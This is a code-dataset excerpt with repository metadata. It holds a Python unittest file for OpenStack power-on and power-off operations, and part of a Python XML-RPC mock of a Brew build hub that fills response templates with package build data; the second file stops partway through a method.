QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 256
|
2016-07-06T17:02:55.000Z
|
2020-10-01T09:35:03.000Z
|
package/tests/test_cp/test_openstack/test_command/test_operations/test_power_operations.py
|
QualiSystems/OpenStack-Shell
|
2e218ee249867550332a9b887a7c50b76ad52e20
|
[
"ISC"
] | 1
|
2017-05-16T20:24:57.000Z
|
2017-05-16T20:24:57.000Z
|
from unittest import TestCase
from mock import Mock
from cloudshell.cp.openstack.command.operations.power_operation import PowerOperation
class TestPowerOperation(TestCase):
    """Unit tests for PowerOperation.power_on / power_off delegation to the
    instance service, including error propagation and logging."""

    def setUp(self):
        self.instance_service = Mock()
        self.power_operation = PowerOperation(instance_service=self.instance_service)
        self.power_operation.instance_waiter = Mock()
        self.power_operation.instance_service = Mock()
        self.openstack_session = Mock()
        self.cloudshell_session = Mock()

    def _make_fixtures(self):
        """Return (deployed_app_resource with vm uid '111', fullname, logger)."""
        deployed_app_resource = Mock()
        deployed_app_resource.vmdetails.uid = '111'
        return deployed_app_resource, '1234', Mock()

    def test_power_on_instance_not_powered(self):
        """power_on delegates to instance_service.instance_power_on with the vm uid."""
        deployed_app_resource, resource_fullname, mock_logger = self._make_fixtures()
        self.power_operation.power_on(openstack_session=self.openstack_session,
                                      cloudshell_session=self.cloudshell_session,
                                      deployed_app_resource=deployed_app_resource,
                                      resource_fullname=resource_fullname,
                                      logger=mock_logger)
        self.power_operation.instance_service.instance_power_on.assert_called_with(
            openstack_session=self.openstack_session,
            instance_id=deployed_app_resource.vmdetails.uid,
            logger=mock_logger)

    def test_power_on_instance_exception(self):
        """A service failure during power_on propagates and is logged."""
        deployed_app_resource, resource_fullname, mock_logger = self._make_fixtures()
        self.power_operation.instance_service.instance_power_on = Mock(
            side_effect=Exception('foo'))
        with self.assertRaises(Exception) as context:
            self.power_operation.power_on(openstack_session=self.openstack_session,
                                          cloudshell_session=self.cloudshell_session,
                                          deployed_app_resource=deployed_app_resource,
                                          resource_fullname=resource_fullname,
                                          logger=mock_logger)
        # Previously `self.assertTrue(context)` — vacuous, since the
        # assertRaises context object is always truthy. Check the message.
        self.assertEqual(str(context.exception), 'foo')
        self.power_operation.instance_service.instance_power_on.assert_called_with(
            openstack_session=self.openstack_session,
            instance_id=deployed_app_resource.vmdetails.uid,
            logger=mock_logger)
        self.assertTrue(mock_logger.error.called)

    def test_power_off_instance_not_powered(self):
        """power_off delegates to instance_service.instance_power_off with the vm uid."""
        deployed_app_resource, resource_fullname, mock_logger = self._make_fixtures()
        self.power_operation.power_off(openstack_session=self.openstack_session,
                                       cloudshell_session=self.cloudshell_session,
                                       deployed_app_resource=deployed_app_resource,
                                       resource_fullname=resource_fullname,
                                       logger=mock_logger)
        self.power_operation.instance_service.instance_power_off.assert_called_with(
            openstack_session=self.openstack_session,
            instance_id=deployed_app_resource.vmdetails.uid,
            logger=mock_logger)

    def test_power_off_instance_exception(self):
        """A service failure during power_off propagates and is logged."""
        deployed_app_resource, resource_fullname, mock_logger = self._make_fixtures()
        self.power_operation.instance_service.instance_power_off = Mock(
            side_effect=Exception('foo'))
        with self.assertRaises(Exception) as context:
            self.power_operation.power_off(openstack_session=self.openstack_session,
                                           cloudshell_session=self.cloudshell_session,
                                           deployed_app_resource=deployed_app_resource,
                                           resource_fullname=resource_fullname,
                                           logger=mock_logger)
        # See note above: assert the actual exception message, not the
        # always-truthy context object.
        self.assertEqual(str(context.exception), 'foo')
        self.power_operation.instance_service.instance_power_off.assert_called_with(
            openstack_session=self.openstack_session,
            instance_id=deployed_app_resource.vmdetails.uid,
            logger=mock_logger)
        self.assertTrue(mock_logger.error.called)
| 50.363636
| 131
| 0.573205
| 438
| 4,986
| 6.134703
| 0.111872
| 0.094157
| 0.162635
| 0.114626
| 0.874581
| 0.861928
| 0.848158
| 0.848158
| 0.846297
| 0.846297
| 0
| 0.008912
| 0.369836
| 4,986
| 98
| 132
| 50.877551
| 0.846276
| 0.024469
| 0
| 0.760563
| 0
| 0
| 0.006997
| 0
| 0
| 0
| 0
| 0
| 0.140845
| 1
| 0.070423
| false
| 0
| 0.042254
| 0
| 0.126761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
23a263f506b2d32cb0014053b8d80084e391be52
| 71,389
|
py
|
Python
|
mock_server/custom/customresponse.py
|
xxxxzm/mock-server
|
2c8d26464c2734a5ab53a6423f41872312d3644f
|
[
"Apache-2.0"
] | null | null | null |
mock_server/custom/customresponse.py
|
xxxxzm/mock-server
|
2c8d26464c2734a5ab53a6423f41872312d3644f
|
[
"Apache-2.0"
] | null | null | null |
mock_server/custom/customresponse.py
|
xxxxzm/mock-server
|
2c8d26464c2734a5ab53a6423f41872312d3644f
|
[
"Apache-2.0"
] | 1
|
2019-05-30T06:37:17.000Z
|
2019-05-30T06:37:17.000Z
|
import xmlrpclib
import uuid
import pyclbr
import sys
# This class dispatches an incoming request to the mock class in this module
# that defines a handler matching the requested method name.
class CustomResponse():
    """Router that forwards a request to whichever mock class in this module
    defines a handler for the requested method name."""

    @staticmethod
    def callMethod(requestData, methodName):
        """Invoke *methodName* ('.' mapped to '_') on the first mock class in
        this module that defines it; return its response, or None if no mock
        class handles the method."""
        methodName = methodName.replace('.', '_')
        __import__('mock_server.custom.customresponse')
        module = sys.modules['mock_server.custom.customresponse']
        # pyclbr enumerates every class defined in the module without
        # importing side effects beyond the module itself.
        for claName, cla in pyclbr.readmodule('mock_server.custom.customresponse').items():
            if claName == 'CustomResponse':
                # Never dispatch back into the router itself.
                continue
            mockClass = getattr(module, claName)
            if CustomResponse.hasMethod(methodName, cla):
                return getattr(mockClass, methodName)(requestData)
        return None

    @staticmethod
    def hasMethod(methodName, cla):
        """Return True when the pyclbr class descriptor lists *methodName*."""
        return methodName in cla.methods
class BrewHubMock():
    """Mock of a Brew (koji) hub XML-RPC endpoint serving templated build
    responses (class continues below with the individual method handlers)."""
    # NOTE(review): 'global' inside a class body binds the following names at
    # MODULE level, so the assignments below create module-wide globals that
    # are shared and mutated by the static methods of this class.
    global dynData # build-related data; id fields must be unique per build
    global buildroot_id # build root unique-id counter
    global nvr_id # package nvr unique-id counter
    global paramSettings # setup parameters (e.g. 'build_type') — presumably set by the harness; TODO confirm
    # Baseline build data; the id/counter fields are bumped on each getBuild call.
    dynData = {'package_name':'libwacom','task_id':8708068,'creation_event_id':9360886,
               "nvr":"libwacom-0.8-1.el6","version":"0.8","release":"1.el6","package_id":49335,
               "id":779902,"name":"libwacom"}
    buildroot_id = 7160000
    nvr_id = 7962202
    paramSettings = {}
@staticmethod
def callMethod(requestData,methodName):
return getattr(BrewHubMock, methodName)(requestData)
@staticmethod
def getBuild(request):
requestRPC = xmlrpclib.loads(request)
dynData['nvr'] = requestRPC[0][0]
buildParts = str(dynData['nvr']).split('-')
dynData['name'] = buildParts[0]
dynData['package_name'] = buildParts[0]
dynData['version'] = buildParts[1]
dynData['release'] = buildParts[2]
dynData['task_id'] = dynData['task_id'] +1
dynData['creation_event_id'] = dynData['creation_event_id'] +1
dynData['package_id'] = dynData['package_id'] + 1
dynData['id'] = dynData['id'] + 1
response="<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>owner_name</name><value><string>ajackson</string></value></member><member><name>package_name</name><value><string>${package_name}</string></value></member><member><name>task_id</name><value><int>${task_id}</int></value></member><member><name>volume_name</name><value><string>DEFAULT</string></value></member><member><name>owner_id</name><value><int>169</int></value></member><member><name>creation_event_id</name><value><int>${creation_event_id}</int></value></member><member><name>creation_time</name><value><string>2014-04-24 10:06:10.693793</string></value></member><member><name>state</name><value><int>1</int></value></member><member><name>nvr</name><value><string>${nvr}</string></value></member><member><name>completion_time</name><value><string>2014-04-24 10:09:17.513764</string></value></member><member><name>epoch</name><value><nil/></value></member><member><name>version</name><value><string>${version}</string></value></member><member><name>creation_ts</name><value><double>1398348370.69379</double></value></member><member><name>volume_id</name><value><int>0</int></value></member><member><name>release</name><value><string>${release}</string></value></member><member><name>package_id</name><value><int>${package_id}</int></value></member><member><name>completion_ts</name><value><double>1398348557.5137601</double></value></member><member><name>id</name><value><int>${id}</int></value></member><member><name>name</name><value><string>${name}</string></value></member></struct></value></param></params></methodResponse>"
for key in dynData:
varData = "${"+key+"}"
response = response.replace(varData, str(dynData[key]))
return response
    @staticmethod
    def getProductListings_fix(request):
        """Return a fixed (single-package) getProductListings XML-RPC response
        for the RHEL-6 variant named in *request* (Client / ComputeNode /
        Workstation / Server), with ${name}/${version}/${release} substituted
        from the current dynData build.

        NOTE(review): some of the template literals below appear to have been
        wrapped onto a second physical line by the file extraction — verify
        against the original source before editing.
        """
        response = ''
        # Pick the hard-coded template matching whichever product variant is
        # mentioned anywhere in the raw request body.
        if(request.count('RHEL-6-Client')>0):
            response = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>Client</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member></struct></value></member><member><name>optional</name><value><struct><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data
></array></value></member></struct></value></member></struct></value></member></struct></value></param></params></methodResponse>"
        elif(request.count('RHEL-6-ComputeNode')>0):
            response = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>optional</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member></struct></value></member></struct></value></param></params></methodResponse>"
        elif(request.count('RHEL-6-Workstation')>0):
            response = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>Workstation</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member></struct></value></member><member><name>optional</name><value><struct><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><
/data></array></value></member></struct></value></member></struct></value></member></struct></value></param></params></methodResponse>"
        elif(request.count('RHEL-6-Server')>0):
            response = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>optional</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></m
ember><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member></struct></value></member><member><name>Server</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>ppc64</name><value><array>
<data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member></struct></value></member></struct></value></param></params></methodResponse>"
        # Substitute the current build's NVR fields into the chosen template.
        response = response.replace('${name}', dynData['name']);
        response = response.replace('${version}', dynData['version']);
        response = response.replace('${release}', dynData['release']);
        return response
    @staticmethod
    def listBuildRPMs_fix(request):
        """Return a fixed listBuildRPMs XML-RPC response of exactly 20 RPM
        entries covering the usual arch/subpackage combinations, generating
        fresh unique ids for each entry on every call.
        """
        # Parallel tables, one slot per generated RPM: arch, subpackage name,
        # and whether the entry starts a new buildroot (1 bumps the counter).
        archs= ["s390x","s390x","s390x","i686","i686","i686","ppc64","ppc64","ppc64","x86_64","x86_64","x86_64","s390","s390","s390","ppc","noarch","ppc","ppc","src"]
        pckgs = ["libwacom-debuginfo","libwacom-devel","libwacom","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-debuginfo","libwacom","libwacom-devel","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-data","libwacom","libwacom-devel","libwacom"]
        buildRoot = [1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0]
        dataBlock = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><array><data>"
        for i in range(20):
            # The module-level counters are shared across calls so every
            # generated RPM gets globally unique buildroot/nvr ids.
            global buildroot_id
            global nvr_id
            # uuid1-derived hex string stands in for the RPM payload hash.
            payloadhash = str(uuid.uuid1()).replace('-','')
            buildroot_id = buildroot_id + buildRoot[i]
            nvr_id = nvr_id +1
            dataBlock = "".join([dataBlock,"<value><struct><member><name>build_id</name><value><int>",str(dynData.get("id")),
                                 "</int></value></member><member><name>nvr</name><value><string>",pckgs[i],"-",dynData['version'],"-",
                                 dynData['release'],"</string></value></member><member><name>buildroot_id</name><value><int>",str(buildroot_id),
                                 "</int></value></member><member><name>buildtime</name><value><int>1398348462</int></value></member><member><name>payloadhash</name><value><string>",
                                 payloadhash,"</string></value></member><member><name>epoch</name><value><nil/></value></member><member><name>version</name><value><string>",
                                 dynData.get("version"),"</string></value></member><member><name>external_repo_id</name><value><int>0</int></value></member><member><name>release</name><value><string>",
                                 dynData.get("release"),"</string></value></member><member><name>size</name><value><int>48700</int></value></member><member><name>arch</name><value><string>",
                                 archs[i],"</string></value></member><member><name>id</name><value><int>",str(nvr_id),
                                 "</int></value></member><member><name>external_repo_name</name><value><string>INTERNAL</string></value></member><member><name>name</name><value><string>",
                                 pckgs[i],"</string></value></member></struct></value>"])
        response = "".join([dataBlock,'</data></array></value></param></params></methodResponse>'])
        # Rename the canned 'libwacom' entries to the currently requested package.
        response = response.replace('libwacom', dynData['name']);
        return response
    @staticmethod
    def getProductListings(request):
        """Return a getProductListings XML-RPC response for the RHEL-6 variant
        named in *request*, repeating the per-package body *num* times with
        the prefixes from `prix` prepended to the package name.

        NOTE(review): some of the template literals below appear to have been
        wrapped onto a second physical line by the file extraction — verify
        against the original source before editing.
        """
        # Optional package-name prefixes used when the response is multiplied.
        prix = ['','aa', 'bb', 'cc','dd','ee','ff','gg','hh','ii','jj','kk']
        num = 1 # multiplier: how many copies of the baseline package set to emit
        # A digit in the 2nd character of the package name selects the multiplier.
        numstr = dynData['name'][1:2]
        if (numstr.isdigit()):
            num = int (numstr)
        response = ''
        if(request.count('RHEL-6-Client')>0):
            # fix1/fix2/fix3 are the fixed XML framing; body1/body2 are the
            # per-package sections repeated num times.
            fix1 = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>Client</name><value><struct>"
            body1 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
            fix2 = "</struct></value></member><member><name>optional</name><value><struct>"
            body2 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
            fix3="</struct></value></member></struct></value></param></params></methodResponse>"
            response = fix1
            body = ""
            # Emit one prefixed package section per multiplier step; body2
            # sections are accumulated and appended after the fix2 framing.
            for m in range(num):
                part1 = body1.replace('${name}', prix[m] + dynData['name']);
                part1 = part1.replace('${version}', dynData['version']);
                part1 = part1.replace('${release}', dynData['release']);
                part2 = body2.replace('${name}', prix[m] + dynData['name']);
                part2 = part2.replace('${version}', dynData['version']);
                part2 = part2.replace('${release}', dynData['release']);
                response = response + part1
                body = body + part2
            response = response + fix2 + body + fix3
        elif(request.count('RHEL-6-ComputeNode')>0):
            fix1 = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>optional</name><value><struct>"
            response = fix1
            for m in range(num):
                body1 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member>"
                part1 = body1.replace('${name}', prix[m] + dynData['name']);
                part1 = part1.replace('${version}', dynData['version']);
                part1 = part1.replace('${release}', dynData['release']);
                response = response + part1
            fix2= "</struct></value></member></struct></value></param></params></methodResponse>"
            response = response + fix2
        elif(request.count('RHEL-6-Workstation')>0):
            fix1 = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>Workstation</name><value><struct>"
            body1 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
            fix2 = "</struct></value></member><member><name>optional</name><value><struct>"
            body2 = "<member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
            fix3="</struct></value></member></struct></value></param></params></methodResponse>"
            response = fix1
            body = ""
            for m in range(num):
                part1 = body1.replace('${name}', prix[m] + dynData['name']);
                part1 = part1.replace('${version}', dynData['version']);
                part1 = part1.replace('${release}', dynData['release']);
                part2 = body2.replace('${name}', prix[m] + dynData['name']);
                part2 = part2.replace('${version}', dynData['version']);
                part2 = part2.replace('${release}', dynData['release']);
                response = response + part1
                body = body + part2
            response = response + fix2 + body + fix3
        elif(request.count('RHEL-6-Server')>0):
            fix1 = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>optional</name><value><struct>"
            body1 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></m
ember><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member>"
            fix2 = "</struct></value></member><member><name>Server</name><value><struct>"
            body2 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
            fix3="</struct></value></member></struct></value></param></params></methodResponse>"
            response = fix1
            body = ""
            for m in range(num):
                part1 = body1.replace('${name}', prix[m] + dynData['name']);
                part1 = part1.replace('${version}', dynData['version']);
                part1 = part1.replace('${release}', dynData['release']);
                part2 = body2.replace('${name}', prix[m] + dynData['name']);
                part2 = part2.replace('${version}', dynData['version']);
                part2 = part2.replace('${release}', dynData['release']);
                response = response + part1
                body = body + part2
            response = response + fix2 + body + fix3
        return response
@staticmethod
def listBuildRPMs(request):
    """Mock Brew's listBuildRPMs XML-RPC call.

    Builds one <struct> entry per RPM of the current build: 20 entries per
    name prefix, and a digit in the second character of the build name
    multiplies the number of prefixes.  The 'libwacom' template is finally
    replaced with the real build name.  Advances the module-level
    buildroot_id and nvr_id counters as a side effect.
    """
    global paramSettings
    global buildroot_id
    global nvr_id
    print(paramSettings)
    # Builds whose configured type excludes 'rpm' own no RPMs: empty answer.
    # ('in' replaces the removed-in-py3 dict.has_key; same behavior on py2.)
    if ('build_type' in paramSettings and paramSettings.get('build_type').count('rpm') == 0):
        return BrewHubMock.respondNone(request)
    archs = ["s390x","s390x","s390x","i686","i686","i686","ppc64","ppc64","ppc64","x86_64","x86_64","x86_64","s390","s390","s390","ppc","noarch","ppc","ppc","src"]
    pckgs = ["libwacom-debuginfo","libwacom-devel","libwacom","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-debuginfo","libwacom","libwacom-devel","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-data","libwacom","libwacom-devel","libwacom"]
    buildRoot = [1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0]
    dataBlock = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><array><data>"
    prix = ['','aa', 'bb', 'cc','dd','ee','ff','gg']
    num = 1
    numstr = dynData['name'][1:2]
